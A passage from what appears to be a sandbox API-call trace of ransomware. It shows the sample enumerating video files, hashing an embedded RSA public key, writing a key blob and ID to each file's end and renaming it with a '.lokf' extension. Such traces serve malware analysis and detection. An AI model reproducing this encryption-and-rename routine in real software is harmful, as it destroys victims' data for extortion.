lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.229] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.229] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.230] CloseHandle (hObject=0x5cc) returned 1 [0060.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0060.230] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0060.230] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\Ln9Eeh629DhOIJi1iM_F.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\ln9eeh629dhoiji1im_f.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\Ln9Eeh629DhOIJi1iM_F.mp4.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\ln9eeh629dhoiji1im_f.mp4.lokf")) returned 1 [0060.231] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbacc1320, ftCreationTime.dwHighDateTime=0x1d4cccf, ftLastAccessTime.dwLowDateTime=0x14391f20, ftLastAccessTime.dwHighDateTime=0x1d4c825, ftLastWriteTime.dwLowDateTime=0x14391f20, ftLastWriteTime.dwHighDateTime=0x1d4c825, nFileSizeHigh=0x0, nFileSizeLow=0x13517, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qX3sjp a6u.flv", cAlternateFileName="QX3SJP~1.FLV")) returned 1 [0060.231] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0060.232] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\qX3sjp a6u.flv") returned=".flv" [0060.232] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\qX3sjp a6u.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\qx3sjp a6u.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.232] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=79127) returned 1 [0060.232] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.234] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x134f1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.234] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.235] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x13517, lpOverlapped=0x0) returned 1 [0060.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.235] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.235] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.236] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.236] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.236] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.236] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.236] GetLastError () returned 0x0 [0060.236] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.236] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.236] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.236] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.236] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.237] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.237] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13517, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.237] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.238] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.238] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.238] CloseHandle (hObject=0x5cc) returned 1 [0060.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0060.239] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\qX3sjp a6u.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\qx3sjp a6u.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\qX3sjp a6u.flv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jysvlz\\qx3sjp a6u.flv.lokf")) returned 1 [0060.240] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbacc1320, ftCreationTime.dwHighDateTime=0x1d4cccf, ftLastAccessTime.dwLowDateTime=0x14391f20, ftLastAccessTime.dwHighDateTime=0x1d4c825, ftLastWriteTime.dwLowDateTime=0x14391f20, ftLastWriteTime.dwHighDateTime=0x1d4c825, nFileSizeHigh=0x0, nFileSizeLow=0x13517, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qX3sjp a6u.flv", cAlternateFileName="QX3SJP~1.FLV")) returned 0 [0060.240] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0060.240] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0060.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329ba68 | out: hHeap=0x660000) returned 1 [0060.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329ba00 | out: hHeap=0x660000) returned 1 [0060.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b6c0 | out: hHeap=0x660000) returned 1 [0060.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32695e0 | out: hHeap=0x660000) returned 1 [0060.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269478 | out: hHeap=0x660000) returned 1 [0060.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269838 | out: hHeap=0x660000) returned 1 [0060.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32694f0 | out: hHeap=0x660000) returned 1 [0060.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269a18 | out: hHeap=0x660000) returned 1 [0060.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269658 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b1e0 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32696d0 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b658 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bda8 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329be10 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32696d0 [0060.241] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.241] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.241] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.242] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.242] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0060.244] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.244] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 